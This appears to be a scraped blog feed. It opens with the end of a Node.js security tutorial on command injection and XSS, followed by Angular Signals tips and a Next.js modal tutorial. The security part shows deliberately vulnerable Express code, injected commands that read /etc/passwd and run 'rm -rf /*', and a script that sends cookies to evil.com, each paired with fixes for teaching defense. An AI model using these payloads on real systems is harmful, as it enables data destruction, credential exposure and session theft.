app.get('/ping', (req, res) => {

  const hostInput = req.query.host;

  

  // VULNERABLE CODE: Direct concatenation of user input into command

  const command = 'ping -c 4 ' + hostInput;

  

  exec(command, (error, stdout, stderr) => {

    if (error) {

      res.status(500).send(`Error: ${stderr}`);

      return;

    }

    res.send(`<pre>${stdout}</pre>`);

  });

});

app.listen(3000);

The Attack

An attacker could exploit this vulnerability by providing a malicious input:

/ping?host=google.com; cat /etc/passwd

The resulting command becomes:

ping -c 4 google.com; cat /etc/passwd

This would execute the ping command followed by displaying the contents of the system’s password file, potentially exposing sensitive information.

/ping?host=;rm -rf /*

Which attempts to delete all files on the system (assuming adequate permissions).

Secure Solution

Here’s how to fix the vulnerability:

const express = require('express');

const { execFile } = require('child_process');

const app = express();

app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {

  const hostInput = req.query.host;

  

  // Input validation: Basic hostname format check

  if (!/^[a-zA-Z0-9][a-zA-Z0-9\.-]+$/.test(hostInput)) {

    return res.status(400).send('Invalid hostname format');

  }

  

  // SECURE CODE: Using execFile which doesn't invoke shell

  execFile('ping', ['-c', '4', hostInput], (error, stdout, stderr) => {

    if (error) {

      res.status(500).send('Error executing command');

      return;

    }

    res.send(`<pre>${stdout}</pre>`);

  });

});

app.listen(3000);

Best Practices to Prevent Command Injection

  1. Avoid shell execution: Use execFile or spawn instead of exec when possible, as they don’t invoke a shell.
  2. Input validation: Implement strict validation of user input using regex or other validation methods.
  3. Allowlists: Use allowlists to restrict inputs to known-good values.
  4. Use built-in APIs: When possible, use Node.js built-in modules instead of executing system commands.
  5. Principle of least privilege: Run your Node.js application with minimal required system permissions.

iJS Newsletter

Keep up with JavaScript’s latest news!

Cross-Site Scripting (XSS) Attacks

This is a kind of security vulnerability that is most often seen in web applications. It allows attackers to inject malicious scripts into web pages that other users view. These scripts can then be executed in the context of the victim’s browser, resulting in potential data theft, session hijacking and other malicious activities. An XSS vulnerability occurs when an application uses unvalidated input in creating a web page.

How XSS Occurs

XSS attacks happen when the attacker is able to inject malicious scripts into a web application and the scripts get executed in the victim’s browser, thus making the attacker perform actions on behalf of the user or even steal sensitive information.

How XSS Occurs in Node.js

XSS attacks can occur in Node.js applications when user input is not properly sanitized or encoded before being included in the HTML output. This can happen in various scenarios, such as displaying user comments, search results, or any other dynamic content.

Types of XSS Attacks

XSS vulnerabilities can be classified into three primary types:

  • Reflected XSS: The malicious script is reflected off a web server, such as in an error message or search result, and is immediately executed by the user’s browser.
  • Stored XSS: The malicious script is stored on the server, such as in a database, and is executed whenever the data is retrieved and displayed to users.
  • DOM-Based XSS: The vulnerability exists in the client-side code rather than the server-side code, and the malicious script is executed as a result of modifying the DOM environment.

Scenario 1: Consider a Node.js application that displays user comments without proper sanitization:

const express = require('express');

const app = express();

app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {

  const comment = req.body.comment;

  res.send(`<div><p>User comment: ${comment}</p></div>`);

});

app.listen(3000, () => {

  console.log('Server is running on port 3000');

});

If an attacker submits a comment containing a malicious script, such as:

<script>alert('XSS');</script>

The application will render the comment as:

<div>

  <p>User comment: <script>alert('XSS');</script></p>

</div>

When another user views the comment, the script will execute, displaying an alert box with the message “XSS”.

Prevention Techniques

To prevent XSS attacks in Node.js applications, developers should implement the following techniques:

  • Input Validation: Ensure that all user inputs are validated to conform to expected formats. Reject any input that contains potentially malicious content.
  • Output Encoding: Encode user inputs before displaying them in the browser. This ensures that any special characters are treated as text rather than executable code.
onst express = require('express');

const app = express();

const escapeHtml = require('escape-html');

app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {

  const comment = escapeHtml(req.body.comment);

  res.send(`<div><p>User comment: ${comment}</p></div>`);

});

app.listen(3000, () => {

  console.log('Server is running on port 3000');

});

Here, escapeHtml is a function that converts special characters to their HTML entity equivalents.

  • Content Security Policy (CSP): Implement a Content Security Policy to restrict the sources from which scripts can be loaded. This helps prevent the execution of malicious scripts.
  • HTTP-Only and Secure Cookies: Use HTTP-only and secure flags for cookies to prevent them from being accessed by malicious scripts.
res.cookie('session', sessionId, { httpOnly: true, secure: true });

Scenario 2: Reflected XSS in a Search Feature

Here’s a simple Express application with an XSS vulnerability:

const express = require('express');

const app = express();

app.get('/search', (req, res) => {

  const searchTerm = req.query.q;

  

  // VULNERABLE CODE: Directly embedding user input in HTML response

  res.send(`

    <h1>Search Results for: ${searchTerm}</h1>

    <p>No results found.</p>

    <a href="/">Back to home</a>

  `);

});

app.listen(3000);

The Attack

An attacker could craft a malicious URL:

/search?q=<script>document.location='https://evil.com/stealinfo.php?cookie='+document.cookie</script>

When a victim visits this URL, the script executes in their browser, sending their cookies to the attacker’s server. This could lead to session hijacking and account takeover.

Secure Solutions

  1. Output Encoding
const express = require('express');

const app = express();

app.get('/search', (req, res) => {

  const searchTerm = req.query.q || ''; 

  // SECURE CODE: Encoding special characters

  const encodedTerm = searchTerm

    .replace(/&/g, '&amp;')

    .replace(/</g, '&lt;')

    .replace(/>/g, '&gt;')

    .replace(/"/g, '&quot;')

    .replace(/'/g, '&#039;');

  res.send(`

    <h1>Search Results for: ${encodedTerm}</h1>

    <p>No results found.</p>

    <a href="/">Back to home</a>

  `);

});

2. Using Template Engines

const express = require('express');

const app = express();

app.set('view engine', 'ejs');

app.set('views', './views');

app.get('/search', (req, res) => {

  const searchTerm = req.query.q || '';

  

  // SECURE CODE: Using EJS template engine with automatic escaping

  res.render('search', { searchTerm });

});

3. Using Content Security Policy

const express = require('express');

const helmet = require('helmet');

const app = express();

// Add Content Security Policy headers

app.use(helmet.contentSecurityPolicy({

  directives: {

    defaultSrc: ["'self'"],

    scriptSrc: ["'self'"],

    styleSrc: ["'self'"],

  }

}));

app.get('/search', (req, res) => {

  // Even with encoding, adding CSP provides defense in depth

  const searchTerm = req.query.q || '';

  const encodedTerm = searchTerm

    .replace(/&/g, '&amp;')

    .replace(/</g, '&lt;')

    .replace(/>/g, '&gt;');

  

  res.send(`

    <h1>Search Results for: ${encodedTerm}</h1>

    <p>No results found.</p>

    <a href="/">Back to home</a>

  `);

});

Best Practices to Prevent XSS

  • Context-appropriate encoding: Only display output encoded according to what it is to be used for HTML, JavaScript, CSS, or URL.
  • Use security libraries: When using HTML, it’s better to use DOMPurify, js-xss or sanitize-html.
  • Content Security Policy: CSP headers can also be used to restrict where scripts come from and when they can be executed.
  • Use modern frameworks: Some frameworks like React, Vue or Angular will encode output for you.
  • X-XSS-Protection: This header should be used to enable browser’s built in XSS filters.
  • HttpOnly cookies: Designate sensitive cookies as HttpOnly to prevent them from being accessed by JavaScript.

Following these practices will go a long way in ensuring that your Node.js applications are secure against XSS attacks, which are still very frequent in web applications.

EVERYTHING AROUND NODEJS

Explore the iJS Node.js & Backend Track

Conclusion

Security requires a comprehensive approach addressing all potential vulnerabilities. We discussed two of the most common threats that affect web applications:

SQL Injection

We explained how unsanitized user input in database queries can result in unauthorized data access or manipulation. To protect your applications:

  • Instead of string concatenation, use parameterized queries.
  • Secure ORMs are also available.
  • All user inputs should be validated before processing.
  • Apply the principle of least privilege for database access

Cross-Site Scripting (XSS)

We looked at how reflected XSS in a search feature can allow attackers to inject malicious scripts that are executed in users’ browsers. Essential defensive measures include:

  • Encoding of output where appropriate
  • Security libraries for HTML sanitization
  • Content Security Policy headers
  • Frameworks that offer protection against XSS
  • HttpOnly cookies for sensitive data.

The post Common Vulnerabilities in Node.js Web Applications appeared first on International JavaScript Conference.

]]>
Professional Tips for Using Signals in Angular https://javascript-conference.com/blog/signals-angular-tips/ Wed, 05 Mar 2025 13:30:01 +0000 https://javascript-conference.com/?p=107575 Signals in Angular offer a powerful yet simple reactive programming model, but leveraging them effectively requires a solid understanding of best practices. In this guide, we explore expert techniques for using Signals in unidirectional data flow, integrating them with RxJS, avoiding race conditions, and optimizing performance. Whether you're new to Signals or looking to refine your approach, these professional tips will help you build seamless and efficient Angular applications.

The post Professional Tips for Using Signals in Angular appeared first on International JavaScript Conference.

]]>
The new Signals in Angular are a simple reactive building block. However, as is so often the case, the devil is in the detail. In this article, I will give three tips to help you use Signals in a more straightforward way. The examples used for this can be found here.

Guiding theory: Unidirectional data flow with signals

The approach for establishing a unidirectional data flow (Fig. 1) serves as the guiding theory for my three tips.

Fig. 1: Signals in Angular-Unidirectional data flow with a store

Fig. 1: Unidirectional data flow with a store

Handlers for UI events delegate to the store. I use the abstract term “intention”, since this process is different for different stores. With the Redux-based NgRx store, actions are dispatched; whereas with the lightweight NgRx Signal store, the component calls a method offered by the store.

The store executes synchronous or asynchronous tasks. These usually lead to a status change, which the application transports to the views of the individual components with signals. As part of this data flow, the state can be projected onto view models using computed, i.e. onto data structures that represent the view of individual use cases on the state.

This approach is based on the fact that signals are primarily suitable for informing the view synchronously about data and data changes. They are less suitable for asynchronous tasks and for representing events. For one, they don’t offer a simple way of dealing with overlapping asynchronous requests and the resulting race conditions. Furthermore, they cannot directly represent error states. Second, signals ignore the resulting intermediate states in the case of directly consecutive value changes. This desired property is called “glitch free”.

For example, if a signal changes from 1 to 2 and immediately afterwards from 2 to 3, the consumer only receives a notification about the 3. This is also conducive to data binding performance, especially as updating with intermediate results would result in an unnecessary performance overhead.

iJS Newsletter

Keep up with JavaScript’s latest news!

Tip 1: Signals harmonize with RxJS

Signals are deliberately kept simple. That’s why it offers fewer options than RxJS, which has been established in the Angular world for years. Thanks to the RxJS interop that Angular provides, the best of both worlds can be combined. Listing 1 demonstrates this. It converts the signals from and to into observables and implements a typeahead based on them. To do this, it uses the operators filter, debounceTime and switchMap provided by RxJS. The latter prevents race conditions for overlapping requests by only using the most recent request. SwitchMap aborts requests that have already been started, unless they have already been completed.

Listing 1

@Component({
  selector: 'app-desserts',
  standalone: true,
  imports: [DessertCardComponent, FormsModule, JsonPipe],
  templateUrl: './desserts.component.html',
  styleUrl: './desserts.component.css',
  changeDetection: ChangeDetectionStrategy.OnPush,
})
export class DessertsComponent {
  #dessertService = inject(DessertService);
  #ratingService = inject(RatingService);
  #toastService = inject(ToastService);

  originalName = signal('');
  englishName = signal('Cake');
  loading = signal(false);

  ratings = signal<DessertIdToRatingMap>({});
  ratedDesserts = computed(() => this.toRated(this.desserts(), this.ratings()));

  originalName$ = toObservable(this.originalName);
  englishName$ = toObservable(this.englishName);

  desserts$ = combineLatest({
    originalName: this.originalName$,
    englishName: this.englishName$,
  }).pipe(
    filter((c) => c.originalName.length >= 3 || c.englishName.length >= 3),
    debounceTime(300),
    tap(() => this.loading.set(true)),
    switchMap((c) =>
      this.#dessertService.find(c).pipe(
        catchError((error) => {
          this.#toastService.show('Error loading desserts!');
          console.error(error);
          return of([]);
        }),
      ),
    ),
    tap(() => this.loading.set(false)),
  );

  desserts = toSignal(this.desserts$, {
    initialValue: [],
  });
  
  […]
}

At the end, the resulting observable is converted into a signal so that the application can continue with the new Signals API. For performance reasons, the application should not switch between the two worlds too frequently.

In contrast to Figure 1, no store is used. Both the intention and the asynchronous action take place in the reactive data flow. If the data flow were outsourced to a service and the loaded data were shared with the shareReplay operator, this service could be regarded as a simple store. However, in line with Figure 1, the component already hands over the execution of asynchronous tasks in the expansion stage shown and receives signals at the end.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

RxJS in Stores

RxJS is also frequently used in stores, like in NgRx in combination with Effects. Instead, the NgRx Signal Store offers its own reactive methods that can be defined with rxMethod (Listing 2).

Listing 2

export const DessertStore = signalStore(
  { providedIn: 'root' },
  withState({
    filter: {
      originalName: '',
      englishName: 'Cake',
    },
    loading: false,
    ratings: {} as DessertIdToRatingMap,
    desserts: [] as Dessert[],
  }),
  […]
  withMethods(
    (
      store,
      dessertService = inject(DessertService),
      toastService = inject(ToastService),
    ) => ({
      
      […]
      loadDessertsByFilter: rxMethod<DessertFilter>(
        pipe(
          filter(
            (f) => f.originalName.length >= 3 || f.englishName.length >= 3,
          ),
          debounceTime(300),
          tap(() => patchState(store, { loading: true })),
          switchMap((f) =>
            dessertService.find(f).pipe(
              tapResponse({
                next: (desserts) => {
                  patchState(store, { desserts, loading: false });
                },
                error: (error) => {
                  toastService.show('Error loading desserts!');
                  console.error(error);
                  patchState(store, { loading: false });
                },
              }),
            ),
          ),
        ),
      ),
    }),
  ),
  withHooks({
    onInit(store) {
      const filter = store.filter;
      store.loadDessertsByFilter(filter);
    },
  }),
);

This example sets up a reactive method loadDessertsByFilter in the store. As it is defined with rxMethod, it receives an observable. The values of this observable pass through the defined pipe. As rxMethod automatically logs on to this observable, the application code must receive the result of the data flow using tap or tabResponse. The latter is an operator from the @ngrx/operators package that combines the functionality of tap, catchError and finalize.

The consumer of a reactive method can pass a corresponding observable as well as a signal or a specific value. The onInit hook shown passes the filter signal. This means all values that the signal gradually picks up pass through the pipe in loadDessertsByFilter. This is where the glitch-free property comes into play.

It is interesting to note that rxMethod can also be used outside the signal store by design. For example, a component could use it to set up a reactive method.

Tip 2: Avoiding race conditions

Overlapping, asynchronous operations usually lead to undesirable race conditions. If users search for two different desserts in quick succession, both results are displayed one after the other. One of the two only flashes briefly before the other replaces it. Due to the asynchronous nature, the order of the search queries doesn’t have to match each of the results obtained.

To prevent this confusing behavior, RxJS offers a few flattening operators:

  • switchMap
  • mergeMap
  • concatMap
  • exhaustMap

These operators differ in how they deal with overlapping requests. The switchMap only deals with the last search request. It cancels any queries that are already running when a new query arrives. This behavior corresponds to what users intuitively expect when working with search filters.

The mergeMap and concatMap operators execute all requests: the former in parallel and the latter sequentially. The exhaustMap operator ignores further requests as long as one is running. These options are another reason for using RxJS and for the RxJS interop and rxMethod.

Another strategy often used in addition or as an alternative is a flag that indicates if the application is currently communicating with the backend.

Listing 3

loadRatings(): void {
  patchState(store, { loading: true });

  ratingService.loadExpertRatings().subscribe({
    next: (ratings) => {
      patchState(store, { ratings, loading: false });
    },
    error: (error) => {
      patchState(store, { loading: false });
      toastService.show('Error loading ratings!');
      console.error(error);
    },
  });
},

Depending on the flag’s value, the application can display a loading indicator or deactivate the respective button. The latter is counterproductive or even impossible with a highly reactive UI if the application can manage without an explicit button.

Tip 3: Signals as triggers

As mentioned earlier, Signals are especially suitable for transporting data to the view, like what’s seen on the right in Figure 1. Real events, UI events, or events displayed with RxJS are the better solution for transmitting an intention. There are several reasons why: First, Signals’ glitch-free property can reduce consecutive changes to the last change.

Consumers must subscribe to the Signal in order to be able to react to value changes. This requires an effect that triggers the desired action and writes the result to a signal. Effects that write to Signals are not welcome. By default, they are even penalized by Angular with an exception. The Angular team wants to avoid confusing reactive chains – changes that lead to changes, which in turn, lead to further changes.

On the other hand, Angular is converting more and more APIs to signals. One example is Signals that can be bound to form fields or Signals that represent passed values (inputs). In most cases, you could argue that instead of listening for the Signal, you can also use the event that led to the Signal change. But in some cases, this is a detour that bypasses the new signal-based APIs.

Listing 4 shows an example of a component that receives the ID of a data set to be displayed as an input signal. The router takes this ID from a routing parameter. This is possible with the relatively new feature withComponentInputBinding.

Listing 4

@Component({ […] })
export class DessertDetailComponent implements OnChanges {

  store = inject(DessertDetailStore);

  dessert = this.store.dessert;
  loading = this.store.loading;

  id = input.required({
    transform: numberAttribute
  });
  
  […]
}

This component’s template lets you scroll between the data records. This logic is deliberately implemented very simply for this example:

<button [routerLink]="['..', id() + 1]" >
  Next
</button>

When scrolling, the input signal id receives a new value. Now, the question arises as to how to trigger the loading of the respective data set in the event of this kind of change. The classic procedure is using the live cycle hook ngOnChanges:

ngOnChanges(): void {
  const id = this.id();
  this.store.load(id);
}

For the time being, there’s nothing wrong with this. However, the planned signal-based components will no longer offer this lifecycle hook. The RFC provides using effects as a replacement.

To escape this dilemma, an rxMethod (e.g. offered by a signal store) can be used:

constructor() {
  this.store.rxLoad(this.id);
}

It should be noted that the constructor transfers the entire signal and not just its current value. The rxMethod subscribes to this Signal and forwards its values to an observable that is used within the rxMethod.

If you don’t want to use the signal store, you can instead use the RxJS interop discussed above and convert the signal into an observable with toObservable.

If you don’t have a reactive method to hand, you might be tempted to define an effect for this task:

constructor() {
  effect(() => {
    this.store.load(this.id());
  });
}

Unfortunately, this leads to the exception in Figure 2.

Fig. 2: Signals in Angular-Error message when using effect.

Fig. 2: Error message when using effect

This problem arises because the entire load method that writes a Signal in the store is executed in the reactive context of the effect. This means that Angular recognizes an effect that writes to a Signal. This has to be prevented by default for the reasons above. It also means that Angular triggers the effect again even if a Signal read in load changes.

Both problems can be prevented by using the untracked function (Listing 5).

Listing 5

constructor() {
  // try to avoid this
  effect(() => {
    const id = this.id();
    untracked(() => {
      this.store.load(id);
    });
  });
}

With this common pattern, untracked ensures that the reactive context does not spill over to the load method. It can write to Signals and the effect doesn’t register for Signals that read load. Angular only triggers the effect again when the Signal id changes, especially since it reads it outside of untracked.

Unfortunately, this code is not especially easy to read. It’s a good idea to hide it behind a helper function:

constructor() {
  explicitEffect(this.id, (id) => {
    this.store.load(id);
  });
}

The created auxiliary function explicitEffect receives a signal and subscribes to it with an effect. The effect triggers the transferred lambda expression using untracked (Listing 6).

Listing 6

import { Signal, effect, untracked } from "@angular/core";

export function explicitEffect<T>(source: Signal<T>, action: (value: T) => void) {
  effect(() => {
    const s = source();
    untracked(() => {
      action(s)
    });
  });
}

Interestingly, the explicit definition of Signals to be obeyed corresponds to the standard behavior of effects in other frameworks, like Solid. The combination of effect and untracked shown is also used in many libraries. Examples include the classic NgRx store, the RxJS interop mentioned above, the rxMethod, or the open source library ngxtension, which offers many extra functions for Signals.

iJS Newsletter

Keep up with JavaScript’s latest news!

To summarize

RxJS and Signals harmonize wonderfully together and the RxJS interop from Angular gives us the best of both worlds. Using RxJS is recommended for representing events. For processing asynchronous tasks, RxJS or stores (which can be based on RxJS) are recommended. The synchronous transport of data to the view should be handled by Signals. Together, RxJS, stores, and Signals are the building blocks for establishing a unidirectional data flow.

The flattening operators in RxJS can also elegantly avoid race conditions. Alternatively or in addition to this, flags can be used to indicate if a request is currently in progress at the backend.

Even if Signals weren’t primarily created to display events, there are cases when you want to react to changes in a Signal. This is the case with framework APIs based on Signals. In addition to the RxJS interop, the rxMethod from the Signal Store can also be used. Another option is the effect/untracked pattern for implementing effects that only react to explicitly named Signals.

The post Professional Tips for Using Signals in Angular appeared first on International JavaScript Conference.

]]>
Shareable Modals in Next.js: URL-Synced Overlays Made Easy https://javascript-conference.com/blog/shareable-modals-nextjs/ Mon, 17 Feb 2025 14:03:07 +0000 https://javascript-conference.com/?p=107476 Modals are a cornerstone of interactive web applications. However, managing their state, making them shareable, and preserving navigation can be complex. Next.js simplifies this with intercepting and parallel routes, enabling deep-linked, URL-synced modals. Together, we’ll build a dynamic feedback modal system with TailwindCSS that can be accessed, shared, and navigated effortlessly, improving both user experience and developer productivity.

The post Shareable Modals in Next.js: URL-Synced Overlays Made Easy appeared first on International JavaScript Conference.

]]>
Modals are essential UI components in web applications, often used for tasks such as displaying additional information, capturing user input, or confirming actions. However, traditional approaches to managing modals present challenges such as maintaining state, handling navigation, and ensuring that context is preserved on refresh.

With Next.js, intercepting and parallel routes introduce a powerful way to make modals URL-synced and shareable. This enables seamless deep linking, backward navigation to close modals, and forward navigation to reopen them – all without compromising the user experience.

In this article, we’ll walk through the process of building a dynamic feedback modal in Next.js. Along the way, we’ll explore advanced techniques, accessibility best practices, and tips for improving your modals for production-ready applications.

Why shareable modals matter

Modals have become an essential feature of modern web applications. Whether it’s a login form, product preview, or feedback submission, modals allow users to interact with your application without leaving the current page. But as simple as modals may seem, traditional implementations can present significant challenges for both users and developers.

Challenges with traditional modals

1. State management in large applications:

Most modal implementations rely on the client-side state to keep track of whether the modal is open or closed. In small applications, this is manageable using tools like React’s “useState” or the Context API. However, in larger applications with multiple modals, this approach becomes complex and error-prone. For example:

  • You may need to manage overlapping modal states across different components.
  • Global state management solutions such as Redux or Zustand can help, but add unnecessary complexity for something as simple as opening or closing a modal

2. Refresh behaviour:

Traditional modals lose their state when the page is refreshed. For example:

  • A user clicks a “Give Feedback” button, opening a modal.
  • They refresh the page, expecting the modal to stay open, but instead, it closes because the client-side state is reset. This disrupts the user experience, forcing users to repeat actions or lose their place in the workflow.

3. Inability to share modal states via URLs:
Consider a scenario where a user wants to share a particular modal with a colleague. With traditional client-side modals, there’s no URL representing the modal state, so the user can’t share or bookmark the modal. This makes the application less versatile and harder to navigate for users who expect modern, shareable interfaces.

How Next.js solves these challenges

Next.js provides a routing system that integrates seamlessly with modals, solving the challenges above. By leveraging features like intercepting routes and parallel routes, you can implement modals that are URL-synced, shareable, and persistent.

1.URL-based state for deep linking:
In Next.js, modal states can be tied directly to URLs. For example:

  • Navigating to /feedback can open a feedback form modal.
  • This URL can be shared or bookmarked, and refreshing the page will keep the modal open.
    This is achieved by associating modal components with specific routes in your file system, giving the modal a dedicated URL.

2.Preserving context and consistent navigation:
Unlike traditional modals, Next.js maintains navigation consistency. For example:

  • Pressing the back button closes the modal instead of navigating to the previous page.
  • Navigating forward reopens the modal, maintaining the user flow.
    These behaviours are automatically handled by Next.js’ routing system, reducing the need for custom logic and improving the user experience.

iJS Newsletter

Keep up with JavaScript’s latest news!

Next.js functions for creating shareable modals

Intercepting routes

Intercepting routes in Next.js allows you to “intercept” navigation to a specific route and render additional UI, such as a modal, without replacing the current page content. This is done using a special folder naming convention in your file system.

Implementation:

Intercepting route folder:

  • To create an interception route, use a folder prefixed with (.).
  • For example, if you wanted to intercept navigation to “/feedback” and display it as a modal, you would create the following structure:
  • app 
    ├── @modal 
    ├── (.)feedback 
    │   │   └── page.tsx 
    │   └── default.tsx 
    ├── feedback 
    │   └── page.tsx  
  • app/feedback/page.tsx renders the full-page version of the feedback form.
  • app/@modal/(.)feedback/page.tsx renders the modal version.

Route behaviour:

  • Navigating directly to /feedback will render the full page (app/feedback/page.tsx).
  • Clicking on a “Give Feedback” button navigates to /feedback, but renders the modal (app/@modal/(.)feedback/page.tsx).

Example modal file:

Listing 1: 

import { Modal } from '@/components/modal';  
export default function FeedbackModal() {  
  return (  
    <Modal>  
      <h2 className="text-lg font-bold">Give Feedback</h2>  
      <form className="mt-4 flex flex-col gap-4">  
        <textarea  
          placeholder="Your feedback..."  
          className="border rounded-lg p-2"  
        />  
        <button  
          type="submit"  
          className="bg-blue-500 text-white py-2 px-4 rounded-lg"  
        >  
          Submit  
        </button>  
      </form>  
    </Modal>  
  );  
}  

Parallel routes

Parallel routes allow multiple routes to be rendered simultaneously in different “slots” of the UI. This feature is particularly useful for rendering modals without disrupting the main layout.

Implementation:

Create a slot:

  • Parallel routes are implemented using folders prefixed with @. For example, @modal defines a slot for modal content.
  • In the root layout, you can include the modal slot next to the main page content.

Example layout file:

Listing 2:

// app/layout.tsx
import "./globals.css";

export default function RootLayout({
  modal,
  children,
}: {
  modal: React.ReactNode;
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body>
        <div>{modal}</div>
        <main>{children}</main>
      </body>
    </html>
  );
}

Fallback content:

  • Define a default.tsx file in the @modal folder to specify the fallback content when the modal is not active.

Listing 3:

// app/@modal/default.tsx
export default function Default() {
  return null; // No modal by default
}

 

Why these features matter

Intercepting routes in Next.js enable dynamic modal rendering without disrupting the layout of the main application. They allow you to associate specific modal components with their own URLs, making it possible to implement deep linking and sharing for modals. This ensures that users can navigate directly to a specific modal or share its state via a URL.

Parallel routes, on the other hand, separate the rendering logic of modals from the rest of the application. By isolating modal behaviour into its own designated slot, parallel routes simplify development and improve maintainability. This separation ensures that modals can be rendered independently, without interfering with the layout or functionality of other parts of the application.

By combining intercepting and parallel routes, Next.js transforms the way modals are implemented. These features make modals more user-friendly by supporting modern navigation patterns and sharing capabilities, while also enhancing developer efficiency through cleaner, more modular code.

iJS Newsletter

Keep up with JavaScript’s latest news!

Building a feedback modal in Next.js with TailwindCSS

Step 1: Setting up the /feedback route

The /feedback route serves as the main feedback page. TailwindCSS is used to style the form and layout.

Listing 4:

// app/feedback/page.tsx
export default function FeedbackPage() {
  return (
    <main className="flex flex-col items-center justify-center min-h-screen bg-gray-100">
      <h1 className="text-2xl font-bold text-gray-800">Feedback</h1>
      <p className="text-gray-600">We’d love to hear your thoughts!</p>
      <form className="mt-4 flex flex-col gap-4 w-full max-w-md">
        <textarea
          className="border border-gray-300 rounded-lg p-2 resize-none focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Your feedback..."
          rows={4}
        />
        <button
          type="submit"
          className="bg-blue-500 text-white py-2 px-4 rounded-lg hover:bg-blue-600 transition"
        >
          Submit
        </button>
      </form>
    </main>
  );
}

Step 2: Define the @modal slot

The @modal slot ensures that no modal is rendered unless explicitly triggered.

Listing 5:

// app/@modal/default.tsx
export default function Default() {
  return null; // Ensures the modal is not active by default
}

EVERYTHING ABOUT REACT & NEXT.JS

Explore the iJS React.js & Next.js Track

Step 3: Implement the modal in the /(.)feedback folder

This step uses the intercepting route pattern (.) to render the modal in the @modal slot.

Listing 6:

// app/@modal/(.)feedback/page.tsx
import { Modal } from '@/components/modal';

export default function FeedbackModal() {
  return (
    <Modal>
      <h2 className="text-lg font-bold text-gray-800">Give Feedback</h2>
      <form className="mt-4 flex flex-col gap-4">
        <textarea
          className="border border-gray-300 rounded-lg p-2 resize-none focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Your feedback..."
          rows={4}
        />
        <button
          type="submit"
          className="bg-blue-500 text-white py-2 px-4 rounded-lg hover:bg-blue-600 transition"
        >
          Submit
        </button>
      </form>
    </Modal>
  );
}

Step 4: Create the reusable modal component

The modal is styled using TailwindCSS for a modern and accessible design.

Listing 7:

// components/modal.tsx
'use client';

import { useRouter } from 'next/navigation';

export function Modal({ children }: { children: React.ReactNode }) {
  const router = useRouter();

  return (
    <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50">
      <div className="bg-white rounded-lg shadow-lg max-w-md w-full p-6 relative">
        <button
          onClick={() => router.back()}
          aria-label="Close"
          className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
        >
          ✖
        </button>
        {children}
      </div>
    </div>
  );
}

Step 5: Update the layout for parallel routing

In the layout, the @modal slot is rendered next to the primary children

Listing 8:

// app/layout.tsx
import Link from 'next/link';
import './globals.css';

export default function RootLayout({
  modal,
  children,
}: {
  modal: React.ReactNode;
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body className="bg-gray-100 text-gray-900">
        <nav className="bg-gray-800 p-4 text-white">
          <Link
            href="/feedback"
            className="hover:underline text-white"
          >
            Give Feedback
          </Link>
        </nav>
        <div>{modal}</div>
        <main className="p-4">{children}</main>
      </body>
    </html>
  );
}

You can find the complete implementation using TailwindCSS, including accessibility enhancements, on my GitHub repository.

Advanced features and enhancements

Accessibility improvements

Accessibility is critical when creating modals. Without proper implementation, modals can confuse users, especially those who rely on screen readers or keyboard navigation. Here are some key practices to ensure that your modal is accessible:

Focus management

When a modal is opened, the focus should be moved to the first interactive element within the modal, and users should not be able to interact with elements outside the modal. In addition, when the modal is closed, the focus should return to the element that triggered it.

This can be achieved by using JavaScript to trap focus within the modal:

Listing 9:

// Updated Modal Component with Focus Management
'use client';

import { useEffect, useRef } from 'react';
import { useRouter } from 'next/navigation';

export function Modal({ children }: { children: React.ReactNode }) {
  const router = useRouter();
  const modalRef = useRef<HTMLDivElement>(null);

  useEffect(() => {
    const focusableElements = modalRef.current?.querySelectorAll(
      'button, [href], input, textarea, select, [tabindex]:not([tabindex="-1"])'
    );
    const firstElement = focusableElements?.[0] as HTMLElement;
    const lastElement = focusableElements?.[focusableElements.length - 1] as HTMLElement;

    // Trap focus within the modal
    function handleTab(e: KeyboardEvent) {
      if (!focusableElements || focusableElements.length === 0) return;

      if (e.key === 'Tab') {
        if (e.shiftKey && document.activeElement === firstElement) {
          e.preventDefault();
          lastElement?.focus();
        } else if (!e.shiftKey && document.activeElement === lastElement) {
          e.preventDefault();
          firstElement?.focus();
        }
      }
    }

    // Set initial focus to the first interactive element
    firstElement?.focus();

    window.addEventListener('keydown', handleTab);
    return () => window.removeEventListener('keydown', handleTab);
  }, []);

  return (
    <div
      ref={modalRef}
      role="dialog"
      aria-modal="true"
      className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50"
    >
      <div className="bg-white rounded-lg shadow-lg max-w-md w-full p-6 relative">
        <button
          onClick={() => router.back()}
          aria-label="Close"
          className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
        >
          ✖
        </button>
        {children}
      </div>
    </div>
  );
}

Focus trapping is essential for maintaining a seamless and accessible user experience when working with modals. It ensures that users cannot accidentally navigate or interact with elements outside the modal while it is open, preventing confusion and unintended actions. Additionally, returning focus to the element that triggered the modal provides a smooth transition when the modal is closed, helping users reorient themselves and continue interacting with the application without disruption. These practices enhance both usability and accessibility, creating a more polished and user-friendly interface.

ARIA attributes

Using semantic HTML and ARIA attributes ensures that screen readers understand the structure and purpose of the modal.

  • Add role=”dialog” to the modal container to define it as a dialog window.
  • Use aria-modal=”true” to indicate that interaction with elements outside the modal is restricted.

Why this is important:
ARIA attributes provide assistive technologies such as screen readers with the necessary context to communicate the purpose of the modal to the user. This ensures a consistent and inclusive user experience.

Error handling and edge cases

Handling edge cases ensures that your modal behaves predictably in all scenarios. Here are some considerations:

Handle Refreshes

Since the modal state is tied to the URL, refreshing the page should display the appropriate content. In Next.js, this happens naturally due to the server-rendered /feedback route and the modal implementation.

Close modal on invalid routes

If the user navigates to an invalid route, the modal should close or render nothing. A catch-all route ([…catchAll]) in the @modal slot ensures this:

export default function CatchAll() {
  return null; // Ensures the modal slot is empty
}

Smooth navigation

Ensure that navigating to another part of the application closes the modal. Using router.back() in the modal close button ensures that the user is returned to the previous route.

Listing 10:

<button
  onClick={() => router.back()}
  aria-label="Close"
  className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
>
  ✖
</button>

